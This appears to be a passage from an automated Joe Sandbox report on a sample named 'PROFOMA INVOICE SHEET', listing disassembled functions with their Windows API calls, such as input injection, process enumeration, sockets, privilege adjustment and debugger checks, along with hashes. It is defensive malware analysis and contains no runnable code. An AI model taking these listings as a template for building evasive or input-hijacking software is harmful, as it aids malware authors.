                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: 69ab29ab3bd5f814578fad48cbb49b0827d9a995d6b2b526727eac8d47432d08
                                    • Instruction ID: 5f8f114a6077b0e3a734b17fb1e9a3d122a883b714c5b77af616dd0b074f92f3
                                    • Opcode Fuzzy Hash: 69ab29ab3bd5f814578fad48cbb49b0827d9a995d6b2b526727eac8d47432d08
                                    • Instruction Fuzzy Hash: 01C24D71E086288FDB26CF28DD807EAB7B9EB45305F5541EAD44DE7281E774AE818F40
                                    APIs
                                    • _wcslen.LIBCMT ref: 003764DC
                                    • CoInitialize.OLE32(00000000), ref: 00376639
                                    • CoCreateInstance.OLE32(0039FCF8,00000000,00000001,0039FB68,?), ref: 00376650
                                    • CoUninitialize.OLE32 ref: 003768D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 886957087-24824748
                                    • Opcode ID: 1d36eef311c99ffebbbba0d1ef735b73c9598ad10ded17ba7ab82853e627b6d1
                                    • Instruction ID: 645ae4f1b716b2363f1b0a1071e3e4bb1980f8baabf93a142f38706ff1a53ee0
                                    • Opcode Fuzzy Hash: 1d36eef311c99ffebbbba0d1ef735b73c9598ad10ded17ba7ab82853e627b6d1
                                    • Instruction Fuzzy Hash: 3ED15A71509601AFC315EF24C8A2E6BB7E8FF95704F00896DF5998B292DB70ED05CB92
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 003822E8
                                      • Part of subcall function 0037E4EC: GetWindowRect.USER32(?,?), ref: 0037E504
                                    • GetDesktopWindow.USER32 ref: 00382312
                                    • GetWindowRect.USER32(00000000), ref: 00382319
                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00382355
                                    • GetCursorPos.USER32(?), ref: 00382381
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003823DF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                    • String ID:
                                    • API String ID: 2387181109-0
                                    • Opcode ID: 0418e66483f94db0772556ca441f145fb554903c40d52df290a3b70a592bfc7d
                                    • Instruction ID: 69e6ad16596597a0675aa0407667a02ac1033397c6e3c50c1f7a54bb6927b0fd
                                    • Opcode Fuzzy Hash: 0418e66483f94db0772556ca441f145fb554903c40d52df290a3b70a592bfc7d
                                    • Instruction Fuzzy Hash: BB31E076504315AFDB22EF55C849B9BBBEDFF88310F00091AF98597181DB75EA08CB92
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00379B78
                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00379C8B
                                      • Part of subcall function 00373874: GetInputState.USER32 ref: 003738CB
                                      • Part of subcall function 00373874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00373966
                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00379BA8
                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00379C75
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                    • String ID: *.*
                                    • API String ID: 1972594611-438819550
                                    • Opcode ID: acefa3723bf395ea9f5a2b690b7e82d05b3aa905fdb0bb9c75e5b25b1167f014
                                    • Instruction ID: 341b222cf0db9bb4fcc42d9f652da02ed2d6d7ffebf4b8e8f23848aa06ad07b6
                                    • Opcode Fuzzy Hash: acefa3723bf395ea9f5a2b690b7e82d05b3aa905fdb0bb9c75e5b25b1167f014
                                    • Instruction Fuzzy Hash: 0341847190120AAFCF27DF64C995BEE7BB8EF05310F148196E409A7291DB359E44CF60
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00319A4E
                                    • GetSysColor.USER32(0000000F), ref: 00319B23
                                    • SetBkColor.GDI32(?,00000000), ref: 00319B36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Color$LongProcWindow
                                    • String ID:
                                    • API String ID: 3131106179-0
                                    • Opcode ID: 7689c712deba257140830563a4995b487f8058b16271f8e3b3d1b1d92486c568
                                    • Instruction ID: 8c915b06377aec254bad198b58d6b4c54200f65e77f298a2edf6d96bccc7e6e2
                                    • Opcode Fuzzy Hash: 7689c712deba257140830563a4995b487f8058b16271f8e3b3d1b1d92486c568
                                    • Instruction Fuzzy Hash: 66A11F70208444BFE72F9A2CAC78FFB269DDF4E341F16410BF802CA9A1C6259D89D271
                                    APIs
                                      • Part of subcall function 0038304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0038307A
                                      • Part of subcall function 0038304E: _wcslen.LIBCMT ref: 0038309B
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0038185D
                                    • WSAGetLastError.WSOCK32 ref: 00381884
                                    • bind.WSOCK32(00000000,?,00000010), ref: 003818DB
                                    • WSAGetLastError.WSOCK32 ref: 003818E6
                                    • closesocket.WSOCK32(00000000), ref: 00381915
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 1601658205-0
                                    • Opcode ID: 8fe7b8e9a4ab8f9a8ca30a89da00a7d33bbf9cbf69661d5007b41c9debbdb10e
                                    • Instruction ID: e176a0e79bc3ce5eee54defc253dacfd12ad23d7bc2a27c78fb47a69295a0e6e
                                    • Opcode Fuzzy Hash: 8fe7b8e9a4ab8f9a8ca30a89da00a7d33bbf9cbf69661d5007b41c9debbdb10e
                                    • Instruction Fuzzy Hash: 3551C671A002009FD716AF24C896F6A77E9AB49718F14849CF9055F3D3CB71AD82CBE1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: 69398bb1b479c58fd70f7282efbfe2350cc57c505e45caab6312fc42ae9b1e43
                                    • Instruction ID: 4dcb2ee70cd6cb8fafdfeb10971a2459a8a7471ec022463465bab1d301bfa276
                                    • Opcode Fuzzy Hash: 69398bb1b479c58fd70f7282efbfe2350cc57c505e45caab6312fc42ae9b1e43
                                    • Instruction Fuzzy Hash: 7F21F7317402025FDB228F1AC844F6A7BE9EF85314F1A9069E846DB351CB72DC42CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: 8539cfbc38b59d3e539d13efd7d98d0dd3da443495d1c501afce494a81b94fec
                                    • Instruction ID: f0c09ad4b708375f49cf1fa10df1824bcb48058dcfe26f17ceb0676e829bbc48
                                    • Opcode Fuzzy Hash: 8539cfbc38b59d3e539d13efd7d98d0dd3da443495d1c501afce494a81b94fec
                                    • Instruction Fuzzy Hash: 33A2D070E0161ACBDF26CF58C8517AEB7B1FF45310F2581AAE855AB285DB30AD81CF91
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003682AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($tb<$|
                                    • API String ID: 1659193697-3847509607
                                    • Opcode ID: 99b841ded16888f2b388ea82d90e6c64cb0f1968a6aace4821e30919c8847a0f
                                    • Instruction ID: 3a40e8156e127f9c210eea814866d340e174a0112a6b379ab183899615a7495b
                                    • Opcode Fuzzy Hash: 99b841ded16888f2b388ea82d90e6c64cb0f1968a6aace4821e30919c8847a0f
                                    • Instruction Fuzzy Hash: 39324778A007059FCB29CF19C081A6AB7F0FF48710B15C56EE59ADB7A1EB70E941CB44
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0038A6AC
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0038A6BA
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0038A79C
                                    • CloseHandle.KERNEL32(00000000), ref: 0038A7AB
                                      • Part of subcall function 0031CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00343303,?), ref: 0031CE8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                    • String ID:
                                    • API String ID: 1991900642-0
                                    • Opcode ID: c445bb2693226d5bd4125575a9f67d3418a3a51a25f69a97f840445812ec7ee7
                                    • Instruction ID: 3dfd74c79c8a1ebd340cf6f4d81c8b91968f635b25ca468386de4d91c3356be5
                                    • Opcode Fuzzy Hash: c445bb2693226d5bd4125575a9f67d3418a3a51a25f69a97f840445812ec7ee7
                                    • Instruction Fuzzy Hash: 80518F715083009FD715EF24C896E6BBBE8FF89754F00895EF5859B292EB30D904CBA2
                                    APIs
                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0036AAAC
                                    • SetKeyboardState.USER32(00000080), ref: 0036AAC8
                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0036AB36
                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0036AB88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 19a4ceac489976da88e6c3ddb42bec5bf8f73cbffc100f4c23f1cb8a236fd6cf
                                    • Instruction ID: 3a254d4dd0b90ec2db2822ffb7c10c144a936fb898a15e75a2e2bd0aea953e68
                                    • Opcode Fuzzy Hash: 19a4ceac489976da88e6c3ddb42bec5bf8f73cbffc100f4c23f1cb8a236fd6cf
                                    • Instruction Fuzzy Hash: 9531E930A40A48AEEB37CA65CC05BFE7BAAAB45310F04C21BE581671D9D3758D81DB66
                                    APIs
                                    • _free.LIBCMT ref: 0033BB7F
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • GetTimeZoneInformation.KERNEL32 ref: 0033BB91
                                    • WideCharToMultiByte.KERNEL32(00000000,?,003D121C,000000FF,?,0000003F,?,?), ref: 0033BC09
                                    • WideCharToMultiByte.KERNEL32(00000000,?,003D1270,000000FF,?,0000003F,?,?,?,003D121C,000000FF,?,0000003F,?,?), ref: 0033BC36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                    • String ID:
                                    • API String ID: 806657224-0
                                    • Opcode ID: ce7d4b927dcc8726ac24ad47c678162d6487ff44bb296d9672dce4e3778ebcb6
                                    • Instruction ID: 6e27613d7de45369c83bd87dec3c3387c86101ad6b52b33372286579a0fa11bb
                                    • Opcode Fuzzy Hash: ce7d4b927dcc8726ac24ad47c678162d6487ff44bb296d9672dce4e3778ebcb6
                                    • Instruction Fuzzy Hash: DB319C71904205EFCB13DF69EC80969FBBCBF45320F1546AAE161DB2A1DB319A40CB50
                                    APIs
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0037CE89
                                    • GetLastError.KERNEL32(?,00000000), ref: 0037CEEA
                                    • SetEvent.KERNEL32(?,?,00000000), ref: 0037CEFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorEventFileInternetLastRead
                                    • String ID:
                                    • API String ID: 234945975-0
                                    • Opcode ID: 0e99342de4d5b86654c7b01fe63f90223cc297c82cefff7973b501531b165272
                                    • Instruction ID: fcc0ef994befab0a0656a3bd9744b8f53777d45af3cadfa821051cf8075a69a0
                                    • Opcode Fuzzy Hash: 0e99342de4d5b86654c7b01fe63f90223cc297c82cefff7973b501531b165272
                                    • Instruction Fuzzy Hash: 0921EAB1510305AFEB32CFA5C988BA6B7FCEB00305F10981EE54AD2551E738EE448BA0
                                    APIs
                                    • lstrlenW.KERNEL32(?,00345222), ref: 0036DBCE
                                    • GetFileAttributesW.KERNEL32(?), ref: 0036DBDD
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0036DBEE
                                    • FindClose.KERNEL32(00000000), ref: 0036DBFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                    • String ID:
                                    • API String ID: 2695905019-0
                                    • Opcode ID: b2751edc09d02f37c161f8a87cdba396cfcb69d102ecead2d93d616ca10aee36
                                    • Instruction ID: 2e81c32f7ca7412d5b9f59a4a1af9e3425b9c41fe9fe30f1d88947650f10158f
                                    • Opcode Fuzzy Hash: b2751edc09d02f37c161f8a87cdba396cfcb69d102ecead2d93d616ca10aee36
                                    • Instruction Fuzzy Hash: 8EF0E530C2091857C222AB7CBC0D8AA376C9E01334F508B03F876C20F4EBB25D94C6D9
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00375CC1
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00375D17
                                    • FindClose.KERNEL32(?), ref: 00375D5F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: 91630b709f7fd99014f2a065f2871bd76928d6dad98b7e7fdb802b119c17bd99
                                    • Instruction ID: e3745e2ee5afe3dbbaf7feb1a339e3513344426217e2760b6edc2487e4c6ef36
                                    • Opcode Fuzzy Hash: 91630b709f7fd99014f2a065f2871bd76928d6dad98b7e7fdb802b119c17bd99
                                    • Instruction Fuzzy Hash: 1C51AA74604A019FC72ACF28C494E96B7E4FF09314F15855EE99A8B3A1CB74FD04CB91
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0033271A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00332724
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00332731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 5393aa0f1a977849555c0e7afd997abce35f4711288db407b8ff237805af0b55
                                    • Instruction ID: 3876d0ebba750a79a824b2cef77946f307fefabeeb6bd1f5a69ff1082e45145d
                                    • Opcode Fuzzy Hash: 5393aa0f1a977849555c0e7afd997abce35f4711288db407b8ff237805af0b55
                                    • Instruction Fuzzy Hash: C531B574911228ABCB22DF64DC8979DB7B8BF08310F5041EAE41CA7261E7749F858F45
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 003751DA
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00375238
                                    • SetErrorMode.KERNEL32(00000000), ref: 003752A1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: 8184611b4984349db1a63b55efbeee3c8a86cd7ff21d22251c44a77f6b4bbec7
                                    • Instruction ID: 4a5c10eed4fdc2287e6601e737e474dc9f3c53f41700767756f4064d136b74b3
                                    • Opcode Fuzzy Hash: 8184611b4984349db1a63b55efbeee3c8a86cd7ff21d22251c44a77f6b4bbec7
                                    • Instruction Fuzzy Hash: 7E318075A10518DFDB01DF54D884EADBBB4FF09314F048499E809AF3A2CB35E846CB51
                                    APIs
                                      • Part of subcall function 0031FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00320668
                                      • Part of subcall function 0031FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00320685
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036170D
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0036173A
                                    • GetLastError.KERNEL32 ref: 0036174A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
